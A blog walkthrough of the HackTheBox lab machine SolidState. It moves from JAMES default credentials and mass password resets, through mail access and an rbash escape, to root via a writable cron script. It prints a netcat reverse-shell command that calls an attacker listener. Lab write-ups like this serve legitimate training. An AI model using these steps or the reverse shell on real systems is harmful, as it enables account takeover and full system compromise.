SolidState HackTheBox WalkThrough

Solidstate hackthebox walkthrough

This is SolidState HackTheBox machine walkthrough and is also the 21th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to SolidState HTB machine. Before starting let us know something about this machine. It is a Linux OS box with IP address 10.10.10.51 and difficulty medium assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with HackTheBox VPN and make sure your connectivity with SolidState machine by pinging its IP 10.10.10.51. If all goes correct then start hacking. As usual I started by scanning the machine. Port scanning gives us information about listening ports and services running over them (banner grabbing) so that we can get our way for further enumeration. I have used Nmap [a port scanner] for this task and the result is below-

Scanning

$ sudo nmap -sC -sV -p- -T3 -oN nmap/full_port 10.10.10.51

Performing nmap scan during Solidstate hackthebox walkthrough

Nmap scan found 6 ports as open. OpenSSH on port 22 and Apache2 web server on port 80 are running. Ports 25, 110, 119 and 4555 have JAMES (Java Apache Mail Enterprise Server) server running over them. For more info about James Server check this wiki link. Enumeration on port 22 is useless until we get some credential. Also OpenSSH 7.4p1 is not affected with any type of critical vulnerability that helps in further enumeration phase so moved forward for enumeration on port 80.

Since apache2 web server is running on port 80 so we should have some website hosted over it which can be accessed at URL http://10.10.10.51/. Ongoing to this URL found a static web page of SOLID STATE SECURITY. I was trying to look for some email address on this site. Since port 25 and 110 are open we can try some phishing attack using it. Check SneakyMailer box which uses phishing attack to capture user credential.

Solidstate htb box webserver home page

After spending some times over this site and checking all its webpages I could not find anything interesting that could help me in further enumeration. Then checked the page source using CTRL+U for some type of hints, again got nothing special. Then started $gobuster (directory bruteforcer) for finding directory and made it to run in background. Meanwhile I moved forward for enumeration on port 4555. JAMES Remote Admin 2.3.2 service is running on it. Then I immediately searched its exploit on exploit-db using $searchsploit (CLI tool to query Exploit-db offline).

Searching for Available Exploits

$ searchsploit Apache JAMES 2.3.2

Searching for available exploits during Solidstate hackthebox walkthrough

Searchsploit found a Remote Command Execution exploit and its metasploit module is also present and a research paper on this vulnerability is also published. When I tried to execute them after mirroring on my Kali machine they executed successfully but I could not get any shell. The reason behind this was they required a valid user to login into SolidState machine so that it can execute shell command. Unfortunately, we don’t have any credential to login till now. After reading the Research Paper listed by searchsploit I found default credentials of James Server is root: root. The research paper link is this. When I tried to login using this credential into James Admin Server I could easily logged in.

James Server exploit snippet from research paper during Solidstate hackthebox walkthrough

Snippet: from Research Paper

Logging Into Apache James Remote Admin Server

After logging into Remote Admin Server I could easily change the password of any user since I am root and root is Boss in UNIX based OS. To list all the commands run HELP command after logging into this Server. When I ran ~listusers command it listed 5 users namely james, thomas, john, mindy & mailadmin. First of all I changed the password of user james to NewPassword then tried to login into his account on SMTP server using ThunderBird (mail client) [use $ sudo apt install evolution to install evolution] but it gave me login failed. Then I changed the password of all the users and tried to login into each of their accounts one by one and got login successful into mindy's account.

$ nc 10.10.10.51 4555

~root

~root

~listusers

~setpassword james NewPassword

~setpassword thomas NewPassword

~setpassword john NewPassword

~setpassword mindy NewPassword

~setpassword mailadmin NewPassword

~QUIT

Changing password of different users after logging into James Server

Login into mindy’s account using ThunderBird. You can also use Evolution for this task.

Login into Email Account

Fill the following information in ThunderBird and click on Continue.

Your name: mindy

Email Address: [email protected]

Password: NewPassword

Login into mindy account during Solidstate hackthebox walkthrough -1

It may give Warning: Thunderbird failed to find the settings of your email account. Ignore it and click on Done.

Login into mindy account during Solidstate hackthebox walkthrough-2

You will get encryption warning. Ignore it and click on Done to proceed further.

SSL warning in thunderbird

After successful login in the mail server you will get a mail in the inbox. This mail contains SSH credential of mindy viz., mindy: [email protected][email protected]

Mindy SSH credential in inbox of mindy

Let us login into mindy’s account to capture user flag.

Getting User Shell

$ ssh [email protected]

[email protected][email protected]

$ whoami && id

$ echo $SHELL

$ exit

Logging into Solidstate during Solidstate hackthebox walkthrough

When I ran $whoami and $id command it gave me command not found error and also -rbash tells us that it is a rbash shell but not a bash shell which we encounter most of the time. $ echo $SHELL command confirms that it is rbash shell or restricted bash shell. The Restricted Shell is a Linux Shell that restrict some of the features of bash shell like execution of shell commands cd, nano, ifconfig, etc. We have to any how bypass this restriction and get a proper bash shell where our general Linux command works so that we can move forward for privilege escalation. After some googling I found a way by which we can bypass this restriction. Check this article from hackingarticles.in.

To bypass this restriction simply login into SSH using -t switch with data bash --noprofile

Bypassing Restricted Bash Shell

$ ssh [email protected] -t "bash --noprofile"

~ [email protected][email protected]

$ whoami && id

Bypassing rbash shell in solidstate htb

We have successfully bypassed the restriction. Let us grab user flag.

Capture User Flag

$ cat user.txt

Capture user flag during Solidstate hackthebox walkthrough

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script) on SolidState machine. Linpeas gives us information of all potential vectors that can be used to escalate privilege to root. You can get Linpeas from here.

Finding PrivEsc Vector

Linpeas found that a cronjob is executing file tmp.py inside the directory /opt/

Finding privesc vector in solidstate htb

After checking the permission of this file found that it is owned by root and normal user can modify it. So this can be our potential privilege escalation vector.

$ ls -la /opt/tmp.py

tmp.py file permission

On checking the content of this file found that it is using system() function to execute OS command. What if we replace rm -r /tmp/* command with our reverse shell command, nc -e /bin/bash 10.10.14.6 4321, we will get reverse shell as root when this file will be executed by root. But before doing all these things let us confirm cronjob which is being executed by root by running process monitoring tool pspy.

content of tmp.py file during Solidstate hackthebox walkthrough

Pspy found that root is executing tmp.py at the interval of every 3 min. Since root is executing this file so all the content in this file will also be executed with root privilege and out reverse shell code will also be executed with same privilege. Soon this file will be executed we will get root shell on our netcat listener.

Running pspy to check running cron in solidstate htb

Getting Root Shell

To get root shell do the following.

  1. Modify the file tmp.py by replacing rm -r /tmp/* with nc -e /bin/bash 10.10.14.6 4321
  2. Start netcat listener on your Kali/Parrot machine. That’s all and wait for 3 min for root to execute the file.

On SolidState Machine

$ cd /opt/

$ nano tmp.py

$ cat tmp.py

~nc -e /bin/bash 10.10.14.6 4321

On Kali Machine

$ nc -nvlp 4321

$ whoami && id

Getting root shell in Solidstate htb

We are root now. Let us capture root flag.

Capture Root Flag

$ cat root.txt

Capturing root flag during Solidstate hackthebox walkthrough

This was how I rooted to SolidState HackTheBox machine. Learnt a lot during this challenge. Hope you have also learnt some new things after rooting this box. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthrough at https://ethicalhacs.com/.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.